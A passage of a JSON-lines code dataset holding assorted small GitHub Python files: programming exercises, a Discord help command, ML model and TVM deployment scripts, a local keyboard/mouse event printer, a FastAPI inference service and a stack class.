the best model of a pruning iteration\n # if we use iterative pruning\n return self.iterative_pruning\n\n def _should_update_sparsity(self, epoch):\n return (\n self.iterative_pruning and epoch % self.epochs_per_iter == 0 and epoch > 0\n )\n\n def op_pre_epoch(self, trainer, state):\n \"\"\"\n note: invoke this function at the begin of each pruning iteration. Each pruning\n iteration contains several epochs. In this function, we will:\n 1. update the sparsity,\n 2. reload the best model from the previous iteration,\n 3. generate the prune mask, and\n 4. apply the mask to prune the weight of the model with increased sparsity.\n \"\"\"\n # check if this epoch we need to update the pruning sparsity\n if self._should_update_sparsity(state.epoch):\n # init best model metric as None at the begin of each iteration.\n # this can make sure the best_model is chosen from previous iteration\n # instead of from the entire training.\n state.best_model_metric = None\n # load best model from previous pruning iteration\n assert state.best_model_state is not None\n trainer.load_best_model(state)\n\n # the sparsity is initialized as start_sparsity, increased every iteration\n self.increase_sparsity(state)\n # start from the second iteration, generate the new mask with increased sparsity\n self._masks = self.get_masks(state.model)\n self.apply_masks(state.model, self._masks)\n","repo_name":"facebookresearch/pytext","sub_path":"pytext/optimizer/sparsifiers/sparsifier.py","file_name":"sparsifier.py","file_ext":"py","file_size_in_byte":29395,"program_lang":"python","lang":"en","doc_type":"code","stars":6357,"dataset":"github-code","pt":"51"} +{"seq_id":"11269124124","text":"# https://www.acmicpc.net/problem/13458\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\ns = list(map(int,input().split()))\nb, c = map(int, input().split())\nresult = 0\n\nfor i in s:\n # 각 시험장에 있는 음시자수 - 총감독관이 감시 할 수 있는 수 \n i -= b\n # 총 감독관은 무조건 1명 !\n cnt = 1\n # 이제 부감독관을 구해보자\n # 부 감독관이 감시할 수 있는 응시자 수\n # 0명 초과, 응시자 수와 부감독관 나눠서 \n # 카운트 해주기 \n # 나머지가 0이 아니면 또 카운트 \n if i > 0:\n cnt += i//c\n if i % c != 0:\n cnt += 1\n result += cnt\nprint(result)\n","repo_name":"nevertheless0404/Keep_studying","sub_path":"BOJ/13458_시험감독.py","file_name":"13458_시험감독.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"72952370079","text":"# Import needed libraries\nimport discord\nimport itertools\nfrom discord.ext import commands\n\n# Custom help command for the bot, so as to not use minimal or default.\n# Built on top of the minimal one.\n# Had to copy paste from the source code because there's no way to override just the lines i need to, haha...\nclass CustomHelpCommand(commands.MinimalHelpCommand):\n\n # Define \"no category\" string on init\n def __init__(self, **options):\n super().__init__(**options)\n self.no_category = \"Other\"\n \n # Replace send_pages method that is called by every help command,\n # so every help command is an embed.\n async def send_pages(self, footer = None):\n dest = self.get_destination()\n for page in self.paginator.pages:\n\n help_embed = discord.Embed(description=page, colour=discord.Colour.from_rgb(102, 120, 255))\n if footer is not None:\n help_embed.set_footer(text=self.get_opening_note().replace(\"`\", \"\") + \" (case sensitive)\")\n\n await dest.send(embed=help_embed)\n\n # This is just the same method as default MinimalHelpCommand, except it\n # puts in the opening note as a parameter to send_note so it loads it as the footer.\n async def send_bot_help(self, mapping):\n ctx = self.context\n bot = ctx.bot\n\n if bot.description:\n self.paginator.add_line(bot.description, empty=True)\n\n no_category = '\\u200b{0.no_category}'.format(self)\n def get_category(command, *, no_category=no_category):\n cog = command.cog\n return cog.qualified_name if cog is not None else no_category\n\n filtered = await self.filter_commands(bot.commands, sort=True, key=get_category)\n to_iterate = itertools.groupby(filtered, key=get_category)\n\n for category, commands in to_iterate:\n commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands)\n self.add_bot_commands_formatting(commands, category)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages(self.get_opening_note())\n\n\n # Same as MinimalHelpCommand but with slight modifications\n async def send_group_help(self, group):\n\n self.paginator.add_line(group.description)\n self.paginator.add_line()\n\n filtered = await self.filter_commands(group.commands, sort=self.sort_commands)\n if filtered:\n self.paginator.add_line('**%s**' % self.commands_heading)\n for command in filtered:\n self.add_subcommand_formatting(command)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages()\n\n async def send_command_help(self, command):\n self.add_command_formatting(command)\n self.paginator.close_page()\n await self.send_pages()\n\n # Remove short help description off of command help.\n def add_command_formatting(self, command):\n if command.description:\n self.paginator.add_line(command.description, empty=True)\n\n signature = self.get_command_signature(command)\n if command.aliases:\n self.paginator.add_line(signature)\n self.add_aliases_formatting(command.aliases)\n else:\n self.paginator.add_line(signature, empty=True)\n\n # Remove opening note from default cog help\n async def send_cog_help(self, cog):\n bot = self.context.bot\n if bot.description:\n self.paginator.add_line(bot.description, empty=True)\n\n if cog.description:\n self.paginator.add_line(cog.description, empty=True)\n\n filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands)\n if filtered:\n self.paginator.add_line('**%s %s**' % (cog.qualified_name, self.commands_heading))\n for command in filtered:\n self.add_subcommand_formatting(command)\n\n note = self.get_ending_note()\n if note:\n self.paginator.add_line()\n self.paginator.add_line(note)\n\n await self.send_pages()\n ","repo_name":"jSulbar/SussyBot","sub_path":"bin/helpers/help_command.py","file_name":"help_command.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13846450824","text":"sandwich_orders = ['BLT', 'Philly cheesesteak', 'Ham & cheese', 'Veggie', 'Chicken', 'Meatball', 'Tuna']\n\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n\n print('Your ' + current_sandwich.title() + ' sandwich is ready.')\n\n finished_sandwiches.append(current_sandwich)\n\nprint('\\nThe following sandwiches are ready for pickup: ')\nfor sandwich in finished_sandwiches:\n print(sandwich)","repo_name":"MrDrDAVID/Python-practice-book","sub_path":"deli.py","file_name":"deli.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"10762728974","text":"from typing import Any, List, Mapping, Union, Optional\nfrom entities.resolvable import Resolvable\nfrom entities.generic import *\nfrom entities.reminder import Content, ReminderEntity\nfrom entities.calendar import CalendarEvent\nfrom exceptions.exceptions import UnderspecificationException\nfrom providers.data_model import DataModel\n\n\nclass Reminders(Resolvable):\n @classmethod\n def create_reminder(\n cls,\n content: Content,\n person_reminded: Optional[Contact] = None,\n date_time: Optional[DateTime] = None,\n calendar_event: Optional[CalendarEvent] = None,\n recovered_args: Optional[Mapping[str, Any]] = None,\n ) -> ReminderEntity:\n if not content:\n payload = {\n \"date_time\": date_time,\n \"person_reminded\": person_reminded,\n \"content\": content,\n \"calendar_event\": calendar_event,\n \"recovered_args\": recovered_args,\n }\n raise UnderspecificationException(\n payload=payload,\n recovery_prompt=\"What should be reminded?\",\n message=\"content argument is missing\",\n )\n reminder = ReminderEntity(\n date_time=date_time,\n person_reminded=person_reminded,\n content=content,\n )\n data_model = DataModel()\n data_model.append(reminder)\n return reminder\n\n # @exception_handler\n @classmethod\n def find_reminders(\n cls,\n person_reminded: Optional[Contact] = None,\n date_time: Optional[DateTime] = None,\n content: Optional[Content] = None,\n ) -> List[ReminderEntity]:\n data_model = DataModel()\n data = data_model.get_data(ReminderEntity)\n if date_time:\n if type(date_time) == list:\n data = [x for x in data if x.data.get(\"date_time\") in date_time]\n else:\n data = [x for x in data if x.data.get(\"date_time\") == date_time]\n\n if person_reminded:\n data = [x for x in data if x.data.get(\"person_reminded\") == person_reminded]\n\n if content:\n data = [x for x in data if x.data.get(\"content\") == content]\n\n return data\n\n @classmethod\n def delete_reminders(\n cls, reminders: Union[ReminderEntity, List[ReminderEntity]]\n ) -> bool:\n data_model = DataModel()\n data = data_model.get_data(ReminderEntity)\n if reminders:\n if type(reminders) == list:\n data = [x for x in data if x not in reminders]\n else:\n data = [x for x in data if x != reminders]\n\n return data\n","repo_name":"asafam/complex-utterance-to-code-api","sub_path":"api/v6/actions/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37761333614","text":"import mraa\nimport time\n\nin1 = mraa.Gpio(33)\nin2 = mraa.Gpio(31)\nin3 = mraa.Gpio(27)\nin4 = mraa.Gpio(23)\n\nin1.dir(mraa.DIR_OUT)\nin2.dir(mraa.DIR_OUT)\nin3.dir(mraa.DIR_OUT)\nin4.dir(mraa.DIR_OUT)\n\ndef forward(delay, steps):\n for i in range(0, steps):\n setStep(1, 0, 1, 0)\n time.sleep(delay)\n setStep(0, 1, 1, 0)\n time.sleep(delay)\n setStep(0, 1, 0, 1)\n time.sleep(delay)\n setStep(1, 0, 0, 1)\n time.sleep(delay)\n\ndef setStep(w1, w2, w3, w4):\n in1.write(w1)\n in2.write(w2)\n in3.write(w3)\n in4.write(w4)\n\nwhile True:\n forward(1000, 2048)\n","repo_name":"ashwinGokhale/BlindSide","sub_path":"embedded/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34248373718","text":"\"\"\" The model for predicting directions (left turn, right turn, straight). Model takes a parameter 'gpu' for training on GPU and testing on CPU.\n\n\"\"\"\nimport torch.nn as nn\n\nclass DirectionClassificationModel(nn.Module):\n def __init__(self, gpu=False): # Temporary GPU parameter as lazy fix for training on gpu and testing on cpu\n super(DirectionClassificationModel, self).__init__()\n self.gpu = gpu \n\n self.layers = nn.Sequential(\n nn.Conv2d(3, 16, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Conv2d(16, 32, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Conv2d(32, 64, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Flatten(),\n nn.Linear(in_features=906304, out_features=128),\n nn.ReLU(),\n nn.Linear(in_features=128, out_features=3),\n )\n\n def forward(self, x):\n if self.gpu:\n x = x.view(x.size(0), 3, 128, 128)\n else:\n x = x.view(1, 3, 128, 128)\n output = self.layers(x)\n return output\n","repo_name":"JustinBoxemDEV/SDC-HANZE-2022","sub_path":"src/MachineLearning/SupervisedLearning/Classification/DirectionClassificationModel.py","file_name":"DirectionClassificationModel.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41720448710","text":"## ================================================\n## 监听键盘\n## ================================================\nfrom pynput.keyboard import Key, Listener, Controller\nfrom pynput.mouse import Listener as MouseListener\nfrom pynput import mouse\nfrom pynput import keyboard\nfrom threading import Thread, Lock\n\n\nruning = True\n\nclass KeyMouCounter():\n\n def __init__(self):\n self.keyboard = Controller() #实例化键盘对象\n self.locker = Lock()\n runing = True\n\n def on_press(self, key): # 按键被按压调用这个函数\n # 输出按压的按键名字\n print('{0} pressed'.format(key))\n\n def on_release(self, key): # 按键被松开调用这个函数\n # 输出松开的按键名字\n global runing\n print('{0} release'.format(key))\n if isinstance(key, keyboard.KeyCode):\n print(key.char)\n else:\n print(key)\n if key == Key.esc: # 如果按了Esc键就停止监听\n self.locker.acquire()\n runing = False\n self.locker.release()\n #print(\"Runging Stat\" , runing)\n print(\"Stop Keyboard listener\")\n return False # Stop listener\n\n def on_move(self, x, y): # 监听鼠标移动\n #print('Pointer moved to {0}'.format((x, y)))\n pass\n\n def on_click(self, x, y, button, pressed): # 监听鼠标点击\n print('{0} at {1}'.format('Pressed' if pressed else 'Released', (x, y)))\n try:\n print(type(button))\n print(button.name)\n except:\n pass\n global runing\n #print(\"Runging Stat\" , runing)\n if not runing: # 如果没有按压就结束程序(即,单击一下鼠标会结束程序)\n # Stop listener\n print(\"Stop Mouse listener\")\n return False\n\n def on_scroll(self, x, y, dx, dy): # 监听鼠标滚轮\n #print('Scrolled {0}'.format((x, y)))\n pass\n\n def mouse_listener(self):\n print('Listener Mouse ...')\n with mouse.Events() as event:\n for i in event:\n #迭代用法。\n if isinstance(i, mouse.Events.Click):\n #鼠标点击事件。\n print(i.x, i.y, i.button, i.pressed)\n\n def keyboard_listener(self):\n print('Listener Keyboard ...')\n with self.keyboard.Events() as event:\n for i in event:\n #迭代用法。\n if isinstance(i, mouse.Events.Click):\n #鼠标点击事件。\n print(i.x, i.y, i.button, i.pressed)\n\n def lister_keyboard(self):\n print('Listener Keyboard ...')\n with Listener(on_press=self.on_press, on_release=self.on_release) as listener:\n listener.join()\n\n def lister_mouse(self):\n print('Listener Mouse ...')\n with MouseListener(on_click=self.on_click) as listener:\n listener.join()\n\n def run(self):\n t_keyboard = Thread(target=self.lister_keyboard)\n t_mouse = Thread(target=self.lister_mouse)\n\n t_mouse.start()\n t_keyboard.start()\n\n t_keyboard.join()\n t_mouse.join()\n\n\nif __name__ == \"__main__\":\n kmc = KeyMouCounter()\n kmc.run()","repo_name":"snowcooled/keymoucheck","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28218152376","text":"def insertionSort(arr):\r\n for i in range (1, len(arr)):\r\n k = arr[i]\r\n j = i-1\r\n while j>=0 and k self.n-start+1:\n return\n \n for i in range(start,self.n+1):\n new_comb = comb+[i]\n self.helpFun(index+1, i+1, new_comb)\n\n\nclass Solution:\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n arr = [x for x in range(1, n+1)]\n curr = []\n self._helpFun(arr, k, res, curr)\n return(res)\n \n def _helpFun(self, arr, k, res, curr):\n if k == 0:\n if curr not in res:\n res.append(curr)\n return\n for i in range(len(arr)):\n newCurr = curr + [arr[i]]\n newArr = arr[i+1:]\n self._helpFun(newArr, k-1, res, newCurr)\n \nfrom itertools import combinations\n\nclass Solution:\n def combine(self, n, k):\n return list(combinations(range(1, n+1), k))\n \n def combine2(self, n, k): \n if k == 0:\n return [[]]\n return [pre + [i] for i in range(k, n+1) for pre in self.combine(i-1, k-1)]\n \n \ns=Solution()\n\nprint(s.combine(5,3))\n\n","repo_name":"fxy1018/Leetcode","sub_path":"77_Combinations.py","file_name":"77_Combinations.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2915622247","text":"import sys\n\nimport torch\nfrom torch import nn\n\n# import torchmetrics\nfrom pytorch_lightning import LightningModule\n\n\nclass LitFCN(LightningModule):\n def __init__(self,dim_in):\n super().__init__()\n #self.save_hyperparameters()\n #self.accuracy = torchmetrics.Accuracy()\n self.dim_in = dim_in\n\n \n self.predictor=None\n if self.dim_in<=5:\n self.predictor=nn.Sequential(\n nn.Linear(self.dim_in,2),\n nn.Tanhshrink(),\n nn.Linear(2,1),\n )\n else:\n layers=[]\n n_in,n_out=self.dim_in,int(self.dim_in//2)\n while n_out>=1:\n if n_out!=1:\n layers.extend([nn.Linear(n_in,n_out), nn.Tanhshrink()])\n else:\n layers.extend([nn.Linear(n_in,n_out)])\n n_in,n_out=n_out,int(n_out//2)\n\n self.predictor=nn.Sequential(*layers)\n\n\n def forward(self,x):\n flux=self.predictor(x)\n return flux\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-2)\n #lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.0001)\n #return {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n return {\"optimizer\": optimizer}\n\n\n\n def training_step(self, batch,batch_idx):\n x, y = batch\n y=y.unsqueeze(1)\n x = x.view(x.size(0), -1)\n\n y_hat = self.forward(x)\n loss_func=nn.MSELoss()\n loss = loss_func(y_hat, y)\n self.log('train_loss', loss)\n return {\"loss\":loss}\n\n def validation_step(self,batch,batch_idx):\n x, y = batch\n x = x.view(x.size(0), -1)\n y=y.unsqueeze(1)\n\n y_hat = self.forward(x)\n loss_func = nn.MSELoss()\n loss = loss_func(y_hat, y)\n\n self.log('val_loss', loss)\n return {\"loss\":loss}\n\n def test_step(self, test_batch, batch_idx):\n x, y = test_batch\n x = x.view(x.size(0), -1)\n y = y.unsqueeze(1)\n\n y_hat = self.forward(x)\n loss_func = nn.MSELoss()\n loss = loss_func(y_hat, y)\n self.log_dict({\"test_loss\": loss})\n return loss\n\n def predict_step(self,data_batch,batch_idx=1):\n x=data_batch\n x=x.view(x.size(0),-1)\n y_hat=self.forward(x)\n return y_hat\n","repo_name":"ptdang1001/MPOSNN","sub_path":"src/SNN/utils/model_interface.py","file_name":"model_interface.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"3654016493","text":"import tvm\nfrom tvm import relay\nfrom tvm import rpc\nfrom tvm.contrib import util, ndk\nfrom tvm.contrib import graph_runtime\nimport numpy as np\nfrom PIL import Image\nimport time\nimport keras\nfrom keras.applications.resnet50 import preprocess_input\n\n#model_path = \"keras/mobilenetV2.h5\"\n#model_path = \"keras/densenet121.h5\"\nmodel_path = \"keras/resnet50.h5\"\n\nimage_path = \"ilsvrc2012/images/ILSVRC2012_val_00000001.JPEG\"\ntarget = \"llvm -target=aarch64-linux-android\" # target = \"opencl\"\ntarget_host = \"llvm -target=aarch64-linux-android\"\n\n# read keras model\nif \"mobilenetV2\" in model_path:\n keras_model = keras.applications.mobilenet_v2.MobileNetV2(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(keras_model))\nif \"densenet121\" in model_path:\n keras_model = keras.applications.densenet.DenseNet121(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(keras_model))\nif \"resnet50\" in model_path:\n keras_model = keras.applications.resnet50.ResNet50(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(model_path))\n\n# preprocess image\nimage = Image.open(image_path).resize((224, 224))\ndata = np.array(image)[np.newaxis, :].astype('float32')\ndata = preprocess_input(data).transpose([0, 3, 1, 2])\nprint('input_1', data.shape)\n\n# parse model from keras\nshape_dict = {'input_1': data.shape}\nmod, params = relay.frontend.from_keras(keras_model, shape_dict) # keras -> tvm.module\nprint(type(mod))\n\n# build graph and params\nwith relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod, target=target,\n target_host=target_host, params=params)\nlib.export_library(\"/Users/liuyuanqiang/Desktop/net.so\", ndk.create_shared) # ndk \n\n# rpc tracker\ntracker = rpc.connect_tracker(\"0.0.0.0\", 9190)\nremote = tracker.request(\"RedmiK30\", priority=0, session_timeout=60)\nif target == \"opencl\":\n ctx = remote.cl(0)\nelse:\n ctx = remote.cpu(0)\nremote.upload(\"/Users/liuyuanqiang/Desktop/net.so\")\nrlib = remote.load_module('net.so')\n\n# run\nstart = time.time()\nmodule = graph_runtime.create(graph, rlib, ctx)\nmodule.set_input(**params)\nmodule.set_input('input_1', tvm.nd.array(data.astype('float32')))\nmodule.run()\ntvm_out = module.get_output(0)\nend = time.time()\n\n# get tvm output id\ntop1_tvm = np.argmax(tvm_out.asnumpy())\nprint(\"relay execution time: \", end - start)\nprint(\"relay top-1 id: {}\".format(top1_tvm))\n\n# get keras output id\nkeras_out = keras_model.predict(data.transpose([0, 2, 3, 1]))\ntop1_keras = np.argmax(keras_out)\nprint(\"keras top-1 id: {}\".format(top1_keras))","repo_name":"David-Xiang/DUDE","sub_path":"tvm_code/test_keras.py","file_name":"test_keras.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2876071257","text":"import threading\nimport time\nimport configuration as conf\nimport io\nimport base64\n\nclass tick(threading.Thread):\n\n t=0\n tickTimes=[]\n camera=None\n move=None\n conf=None\n stopping=False\n mostRecentImageData=None\n\n def __init__(self, camera, move):\n threading.Thread.__init__(self)\n self.camera=camera\n self.move=move\n\n def doSense(self):\n imageData={}\n imageData[\"cameraStartTime\"]=time.time()\n image_stream = io.BytesIO()\n self.camera.capture(image_stream, 'jpeg', use_video_port=True)\n imageData[\"image\"]=base64.b64encode(image_stream.getvalue())\n imageData[\"cameraEndTime\"]=time.time()\n self.mostRecentImageData=imageData\n\n def getData(self):\n data={}\n data[\"mostRecentImageData\"]=self.mostRecentImageData\n return data\n\n def run(self):\n while not self.stopping:\n tickStartTime = time.time()\n self.tickTimes.append(time.time())\n # doMove(m)\n print(\"start sense: \", time.time())\n self.doSense()\n print(\"end sense: \", time.time())\n remainingTickTime = tickStartTime + conf.tickTime - time.time()\n if remainingTickTime > 0:\n print(remainingTickTime)\n time.sleep(remainingTickTime)\n self.t += 1\n\n def stop(self):\n self.stopping=True","repo_name":"andreaskdk/robo","sub_path":"command/tick.py","file_name":"tick.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40209852637","text":"import sys\ninput = sys.stdin.readline\n\n# 격자크기: n, 방문지점개수: m\nn, m = map(int, input().split())\n\n# 맵\nmaps = [list(map(int, input().split())) for _ in range(n)]\n\n# 방문해야 하는 지점\nloc = []\nfor _ in range(m):\n x, y = map(int, input().split())\n loc.append([x-1, y-1])\n\n# 방문확인\nvisited = [[0 for _ in range(n)] for _ in range(n)]\n\n# 방향\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\n# 경로개수\ncnt = 0\n\n# 경로탐색: dfs\ndef dfs(now, destIdx):\n global cnt # 경로개수 count\n if now == loc[destIdx]: # 도착했다면\n if destIdx == m - 1: # 방문지점의 마지막에 있다면\n cnt += 1\n return\n else:\n destIdx += 1 # 다음 방문위치 저장\n x, y = now\n visited[x][y] = True # 방문 확인\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n # 맵 안에 있으며, 방문하지 않았으며, 방문할 수 있는\n if 0 <= nx < n and 0 <= ny < n and visited[nx][ny] == False and maps[x][y] == 0:\n dfs([nx, ny], destIdx)\n visited[x][y] = False # 방문 초기화\n return \n\n# 시작\ndfs(loc[0], 1) # 처음 시작 위치, 도착해야 하는 첫번째 지점\n\n# 결과\nprint(cnt)","repo_name":"seonwook97/Coding_test","sub_path":"Softeer/순서대로 방문하기/순서대로 방문하기.py","file_name":"순서대로 방문하기.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40309788664","text":"from court import Court\r\n\r\n\r\nclass Stadium(Court):\r\n __name: str\r\n __common_name: str\r\n __capacity: int\r\n\r\n def __init__(self, width: float, length: float,\r\n address: str, year_built: int, name: str,\r\n common_name: str = '', capacity: int = 0) -> None:\r\n super().__init__(width, length, address, year_built)\r\n self.__name = name\r\n self.__common_name = common_name\r\n if capacity >= 0:\r\n self.__capacity = capacity\r\n else:\r\n self.__capacity = 0\r\n\r\n @property\r\n def name(self) -> str:\r\n return self.__name\r\n\r\n @property\r\n def common_name(self) -> str:\r\n return self.__common_name\r\n\r\n @property\r\n def capacity(self) -> int:\r\n return self.__capacity\r\n\r\n @name.setter\r\n def name(self, value: str) -> None:\r\n self.__name = value\r\n\r\n @common_name.setter\r\n def common_name(self, value: str) -> None:\r\n self.__common_name = value\r\n\r\n @capacity.setter\r\n def capacity(self, value: int) -> None:\r\n if value < 0:\r\n print('Attribute error')\r\n else:\r\n self.__capacity = value\r\n\r\n def __eq__(self, other: 'Stadium') -> bool:\r\n return self.capacity == other.capacity and \\\r\n self.area() == other.area()\r\n\r\n def __ne__(self, other: 'Stadium') -> bool:\r\n return self.capacity != other.capacity or \\\r\n self.area() != other.area()\r\n\r\n def __str__(self) -> str:\r\n if self.__common_name != '':\r\n return f'Boisko wybudowane w roku ' \\\r\n f'{self.year_built}, o długości ' \\\r\n f'{self.length} metrów i szerokości {self.width} metrów.' \\\r\n f'\\nPole powierzchni: {self.area()} mkw.' \\\r\n f'\\nAdres: {self.address}.' \\\r\n f'\\nNazwa: {self.name}.' \\\r\n f'\\nPojemność stadionu: {self.capacity} osób.'\r\n else:\r\n return f'Boisko wybudowane w roku ' \\\r\n f'{self.year_built}, o długości ' \\\r\n f'{self.length} metrów i szerokości {self.width} metrów.' \\\r\n f'\\nPole powierzchni: {self.area()} mkw.' \\\r\n f'\\nAdres: {self.address}.' \\\r\n f'\\nNazwa: {self.name}.' \\\r\n f'\\nNazwa zwyczajowa: {self.common_name}.' \\\r\n f'\\nPojemność stadionu: {self.capacity} osób.'\r\n","repo_name":"Malffy/Praca","sub_path":"Programowanie_Obiektowe/K1-Probne/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43911663854","text":"from PIL import Image\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser(description='\\nThis program Read JSON file... ')\r\nparser.add_argument('file_name',help='Add JSON file name') \r\nargs = parser.parse_args()\r\nname = args.file_name.split('-')[1]\r\nimage1 = Image.open(args.file_name)\r\nim1 = image1.convert('RGB')\r\nim1.save(name+'.pdf')","repo_name":"Priyank2000/Priyank2000","sub_path":"pdf_images/image_to_pdf.py","file_name":"image_to_pdf.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18566174504","text":"\nclass Node:\n\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = None\n self.right = None\n\n \ndef minDepth(self):\n q = [] \n if self == None:\n return 0\n q.append({'node': self, 'depth':1})\n c = self\n while(len(q) > 0):\n i = q.pop(0)\n node = i['node']\n depth = i['depth']\n if node.left is None and node.right is None:\n return depth\n \n if node.left is not None:\n q.append({'node': node.left, 'depth': depth + 1})\n if node.right is not None:\n q.append({'node': node.right, 'depth': depth + 1})\n \n\nif __name__ == \"__main__\":\n root = Node(1) \n root.left = Node(2) \n root.right = Node(3) \n root.left.left = Node(4) \n root.left.right = Node(5) \n print(minDepth(root))","repo_name":"arun6582/Algorithm-practice","sub_path":"python/min_depth_binary.py","file_name":"min_depth_binary.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9493364026","text":"# -*- coding: utf-8 -*-\nimport fire\nimport uvicorn\nfrom pathlib import Path\nfrom fastapi import FastAPI\nfrom nli import PytorchPredict, ONNXPredict\nfrom config import settings\nfrom data_model import InputContent, InferenceResult\nfrom custom_logging import CustomizeLogger\nfrom fastapi.encoders import jsonable_encoder\n\nconfig_path = Path(__file__).with_name(\"logging_config.json\")\nlogging = CustomizeLogger.make_logger(config_path)\n\npytorch_app = FastAPI(debug=True, title=settings.TITLE)\nonnx_app = FastAPI(debug=True, title=settings.TITLE)\napp = FastAPI(debug=True, title=settings.TITLE)\ntp = PytorchPredict(model=settings.PYTORCH_MODEL_PATH)\nop = ONNXPredict(onnx_model_path=settings.ONNX_MODEL_PATH)\n\n\n@pytorch_app.api_route(settings.PYTORCH_ROUTING, methods=[\"GET\", \"POST\", \"PUT\"], response_model=InferenceResult)\ndef pytorch_predict(request: InputContent):\n text = request.text\n result = tp.total_control(text)\n logging.info(result)\n return result\n\n\n@onnx_app.api_route(settings.ONNX_ROUTING, methods=[\"GET\", \"POST\", \"PUT\"], response_model=InferenceResult)\ndef onnx_predict(request: InputContent):\n text = request.text\n result = op.total_control(text)\n logging.info(result)\n return result\n\n\nif __name__ == '__main__':\n # fire.Fire(main)\n uvicorn.run(onnx_app, host=\"0.0.0.0\", port=8000)\n","repo_name":"Ziba-li/template_classify","sub_path":"deploy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"8203390501","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'statify'\nurlpatterns = [\n path('', views.signup, name='signup'),\n path('spotifyauth', views.spotifyauth, name='spotifyauth'),\n path('callback', views.callback, name='callback'),\n path('profile', views.profile, name='profile'),\n path('logout_user', views.logout_user, name='logout_user'),\n path('login_user', views.login_user, name='login_user')\n]\n","repo_name":"XanderRiga/spotify-stats","sub_path":"statify/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35935294528","text":"\n\n\n\nclass Stack:\n '''A last-in, first-out (LIFO) stack of items'''\n\n def __init__(self):\n '''(Stack) -> NoneType\n Create a new, empty stack.\n '''\n # this time, we'll store our stack as a dictionary\n # with the height of the item mapping to the item itself\n # we'll also need to keep track of the current height of\n # the stack\n self._contents = {}\n self._height = 0\n\n def push(self, new_obj):\n '''(Stack, object) -> NoneType\n Place new_obj on top of this stack.\n '''\n # putting a new item on top of the stack means adding it\n # to the dictionary at the current height (so the bottom\n # element will have index 0), and then increasing the\n # height accordingly\n self._contents[self._height] = new_obj\n self._height += 1\n\n def pop(self):\n '''(Stack) -> object\n Remove and return the top item in this stack.\n '''\n # top pop an item off the top of the stack, we first have\n # to decrease the height of the stack (remember that in our\n # dictionary we're indexing from 0)\n self._height -= 1\n # we don't really have to delete the item from the dictionary\n # because we'll never access it again, if we ever grow to that\n # height again, we'll just re-map the height value to a new\n # object\n 